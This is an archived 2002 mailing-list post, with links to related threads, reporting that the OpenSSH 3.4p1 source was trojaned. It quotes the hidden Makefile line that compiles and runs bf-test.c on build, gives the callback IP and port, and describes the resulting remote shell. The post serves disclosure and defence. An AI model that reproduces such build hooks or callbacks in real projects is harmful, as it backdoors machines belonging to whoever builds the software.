Re: [fw-wiz] OpenSSH 3.4p1 possibly trojaned

From: hennings@skiinfo.com
Date: 08/01/02


From: hennings@skiinfo.com
To: "Paul D. Robertson" <proberts@patriot.net>
Date: Thu Aug  1 10:01:00 2002


| It would appear that the OpenSSH code for all the non-OpenBSD systems was
| trojaned at some point pretty recently.

(...)
| all: libopenbsd-compat.a
| + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
| ./bf-test.out &
|
| Trojan connection:
|
| 203.62.158.32:6667 (web.snsonline.net)

More details:

The source file (bf-test.c) contains a header with some spelling
mistakes, and then blocks of binary data. When run, the binary block is
deobfuscated and written to to a shell script in the current directory
and then run from the Makefile.

The generated script contains some C code, which is compiled and then
run.

It's forking, connecting to 203.62.158.32:6667, and reading commands
from the socket, A, D or M. (D execs /bin/sh connected to the socket, A
exits, and M seems to make the process sleep for a while.)

Regards

Henning Spjelkavik

-- 
Skiinfo AS
Christian Krohgsgate 60     Fax:        22114011
0186 Oslo                   Foretaksnr: 976036859
 
http://www.webinfo.no/      E-mail:   info@webinfo.no


Relevant Pages

  • Re: Port Scanning...Unauthorized HTTP Access...What does this mean...?
    ... >> instead, they initiate the connection themselves, often to IRC servers. ... Ok, to simplify this somewhat, I'll limit this to remote access malware. ... The later is referred to as a trojan horse (something harmful ...
    (comp.security.firewalls)
  • Trojan / Spyware Connection made to 64.240.175.18 every time you use IE ANti-spyware Anti-virus wont
    ... A friend mentioned the other day that he is seeing a connection is being ... made to 64.240.175.18 on port 8989, every time he use Internet Explorer. ... I did run a port monitor application and Lunched Internet Explore and went ... One of these key was used to lunch the trojan everytime you run IE. ...
    (Bugtraq)
  • RE: a few basic simple questions
    ... Always-on Internet connection, such as Cable, DSL, ISDN, LAN, etc. ... Using MS Outlook or Outlook Express. ... If using a trojan to fight a trojan to cure the ... or ask here about ports you're not familiar with. ...
    (Security-Basics)
  • Re: BlackICE Defender vs. hardware firewall
    ... take the network cable either out of the network card or the cablemodem. ... >> trojan running on your maschines, nothing can happen to you from that. ... >> Just turn off your Internet connection or unplug your network cable ... > specifically asked if I could turn off the cable connection and was told ...
    (comp.security.firewalls)
  • Re: Reinstall SBS2003 Premium
    ... Steve and Les, ... You are correct - the Trojan is back. ... Internet Connection Wizard after the SP1 problem on 7/13. ...
    (microsoft.public.windows.server.sbs)